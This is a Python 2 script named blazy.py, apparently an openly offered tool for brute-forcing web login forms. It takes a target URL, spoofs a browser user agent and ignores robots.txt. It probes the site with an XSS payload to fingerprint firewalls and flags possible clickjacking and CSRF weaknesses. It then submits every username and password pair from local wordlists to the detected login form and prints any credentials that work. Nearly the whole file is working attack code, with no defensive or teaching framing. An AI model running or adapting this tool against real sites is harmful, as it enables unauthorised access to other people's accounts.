blazy.py

1. #!/usr/bin/env python2
2. #Modules
3. import mechanize
4. import itertools
5. import cookielib
6. import sys
7. from bs4 import BeautifulSoup
8. from re import search, findall
9. from urllib import urlopen
10. from urllib2 import URLError
11. #Stuff related to Mechanize browser module
12. br = mechanize.Browser() #Shortening the call by assigning it to a varaible "br"
13. # set cookies
14. cookies = cookielib.LWPCookieJar()
15. br.set_cookiejar(cookies)
16. # Mechanize settings
17. br.set_handle_equiv(True)
18. br.set_handle_redirect(True)
19. br.set_handle_referer(True)
20. br.set_handle_robots(False)
21. br.set_debug_http(False)
22. br.set_debug_responses(False)
23. br.set_debug_redirects(False)
24. br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time = 1)
25. br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'),
26. ('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), ('Accept-Encoding','br')]
27. # Banner
28. print """\033[1;37m    ____   _                    
29.   |  _ \ | |              
30.   | |_) || |  __ _  ____ _   _
31.   |  _ < | | / _` ||_  /| | | |
32.   | |_) || || (_| | / / | |_| |
33.   |____/ |_| \__,_|/___| \__, |
34.                           __/ |
35.    Made with \033[91m<3\033[37m By D3V\033[1;37m   |___/
36.    \033[0m"""
37. url = raw_input('\033[1;34m[?]\033[0m Enter target URL: ') #takes input from user
38. if 'http://' in url:
39.     pass
40. elif 'https://' in url:
41.     url = url.replace('https://', 'http://')
42. else:
43.     url = 'http://' + url
44. try:
45.     br.open(url, timeout=10.0) #Opens the url
46. except URLError as e:
47.     url = 'https://' + url
48.     br.open(url)
49. forms = br.forms() #Finds all the forms present in webpage
50.  
51. headers = str(urlopen(url).headers.headers).lower() #Fetches headers of webpage
52. if 'x-frame-options:' not in headers:
53.     print '\033[1;32m[+]\033[0m Heuristic found a Clickjacking Vulnerability'
54. if 'cloudflare-nginx' in headers:
55.     print '\033[1;31m[-]\033[0m Target is protected by Cloudflare'
56. data = br.open(url).read() #Reads the response
57. if 'type="hidden"' not in data:
58.     print '\033[1;32m[+]\033[0m Heuristic found a CSRF Vulnerability'
59.  
60. soup =  BeautifulSoup(data, 'lxml') #Pareses the response with beuatiful soup
61. i_title = soup.find('title') #finds the title tag
62. if i_title != None:
63.     original = i_title.contents #value of title tag is assigned to 'original'
64.  
65. def WAF_detector(): #WAF detection function
66.     noise = "?=<script>alert()</script>" #a payload which is noisy enough to provoke the WAF
67.     fuzz = url + noise
68.     res1 = urlopen(fuzz) #Opens the noise injected payload
69.     if res1.code == 406 or res1.code == 501: #if the http response code is 406/501
70.         print"\033[1;31m[-]\033[1;m WAF Detected : Mod_Security"
71.     elif res1.code == 999: #if the http response code is 999
72.         print"\033[1;31m[-]\033[1;m WAF Detected : WebKnight"
73.     elif res1.code == 419: #if the http response code is 419
74.         print"\033[1;31m[-]\033[1;m WAF Detected : F5 BIG IP"
75.     elif res1.code == 403: #if the http response code is 403
76.         print "\033[1;31m[-]\033[1;m Unknown WAF Detected"
77. WAF_detector()
78.  
79. def wordlist_u(lst): #Loads usernames from usernames.txt
80.     try:
81.         with open('usernames.txt','r') as f:
82.             for line in f:
83.                 final = str(line.replace("\n",""))
84.                 lst.append(final)
85.     except IOError:
86.         print "\033[1;31m[-]\033[1;m Wordlist not found!"
87.         quit()
88. def wordlist_p(lst): #Loads passwords from passwords.txt
89.     try:
90.         with open('passwords.txt','r') as f:
91.             for line in f:
92.                 final = str(line.replace("\n",""))
93.                 lst.append(final)
94.     except IOError:
95.         print"\033[1;31m[-]\033[1;m Wordlist not found!"
96.         quit()
97. usernames = []
98. wordlist_u(usernames)
99. print '\033[1;97m[>]\033[1;m Usernames loaded: %i'% len(usernames)
100. passwords = []
101. wordlist_p(passwords)
102. print '\033[1;97m[>]\033[1;m Passwords loaded: %i'% + len(passwords)
103. def find(): #Function for finding forms
104.     form_number = 0
105.     for f in forms: #Finds all the forms in the webpage
106.         data = str(f) #Converts the response recieved to string
107.         username = search(r'<TextControl\([^<]*=\)>', data) #Searches for fields that accept plain text
108.  
109.         if username: #if such field is found
110.             username = (username.group().split('<TextControl(')[1][:-3]) #Extractst the name of field
111.             print '\033[1;33m[!]\033[0m Username field: ' + username #prints name of field
112.             passwd = search(r'<PasswordControl\([^<]*=\)>', data) #Searchs for fields that accept password like text
113.  
114.             if passwd: #if such field is found
115.                 passwd = (passwd.group().split('<PasswordControl(')[1][:-3]) #Extracts the field name
116.                 print '\033[1;33m[!]\033[0m Password field: ' + passwd #prints name of field
117.                 select_n = search(r'SelectControl\([^<]*=', data) #checks for other selectable menus in form
118.  
119.                 if select_n: #if a menu is found
120.                     name = (select_n.group().split('(')[1][:-1]) #Extracts the menu name
121.                     select_o = search(r'SelectControl\([^<]*=[^<]*\)>', data) #select_o is the name of menu
122.  
123.                     if select_o: #Proceeds to find options of menu
124.                         menu = "True" #Sets the menu to be true
125.                         options = (select_o.group().split('=')[1][:-1]) #Extracts options
126.                         print '\n\033[1;33m[!]\033[0m A drop down menu detected.'
127.                         print '\033[1;33m[!]\033[0m Menu name: ' + name #prints menu name
128.                         print '\033[1;33m[!]\033[0m Options available: ' + options #prints available options
129.                         option = raw_input('\033[1;34m[?]\033[0m Please Select an option:>> ') #Gets option from user
130.                         brute(username, passwd, menu, option, name, form_number) #Calls the bruteforce function
131.                     else:
132.                         menu = "False" #No menu is present in the form
133.                         try:
134.                             brute(username, passwd, menu, option, name, form_number) #Calls the bruteforce function
135.                         except Exception as e:
136.                             cannotUseBruteForce(username, e)
137.                             pass                           
138.                 else:
139.                     menu = "False" #No menu is present in the form
140.                     option = "" #Sets option to null
141.                     name = "" #Sets name to null
142.                     try:
143.                         brute(username, passwd, menu, option, name, form_number) #Calls the bruteforce function
144.                     except Exception as e:
145.                        cannotUseBruteForce(username, e)
146.                        pass
147.             else:
148.                 form_number = form_number + 1
149.                 pass
150.         else:
151.             form_number = form_number + 1
152.             pass
153.     print '\033[1;31m[-]\033[0m No forms found'
154. def cannotUseBruteForce(username, e):
155.     print '\r\033[1;31m[!]\033[0m Cannot use brute force with user %s.' % username
156.     print '\r    [Error: %s]' % e.message  
157. def brute(username, passwd, menu, option, name, form_number):
158.     for uname in usernames:
159.         progress = 1
160.         print '\033[1;97m[>]\033[1;m Bruteforcing username: %s'% uname
161.         for password in passwords:
162.             sys.stdout.write('\r\033[1;97m[>]\033[1;m Passwords tried: %i / %i'% (progress, len(passwords)))
163.             sys.stdout.flush()
164.             br.open(url)  
165.             br.select_form(nr=form_number)
166.             br.form[username] = uname
167.             br.form[passwd] = password
168.             if menu == "False":
169.                 pass
170.             elif menu == "True":
171.                 br.form[name] = [option]
172.             else:
173.                 pass
174.             resp = br.submit()
175.             data = resp.read()
176.             data_low = data.lower()
177.             if 'username or password' in data_low:
178.                 pass
179.             else:
180.                 soup =  BeautifulSoup(data, 'lxml')
181.                 i_title = soup.find('title')
182.                 if i_title == None:
183.                     data = data.lower()
184.                     if 'logout' in data:
185.                         print '\n\033[1;32m[+]\033[0m Valid credentials found: '
186.                         print uname
187.                         print password
188.                         quit()
189.                     else:
190.                         pass
191.                 else:
192.                     injected = i_title.contents
193.                     if original != injected:
194.                         print '\n\033[1;32m[+]\033[0m Valid credentials found: '
195.                         print '\033[1;32mUsername: \033[0m' + uname
196.                         print '\033[1;32mPassword: \033[0m' + password
197.                         quit()
198.                     else:
199.                         pass
200.             progress = progress + 1
201.         print ''
202.     print '\033[1;31m[-]\033[0m Failed to crack login credentials'
203.     quit()
204. find()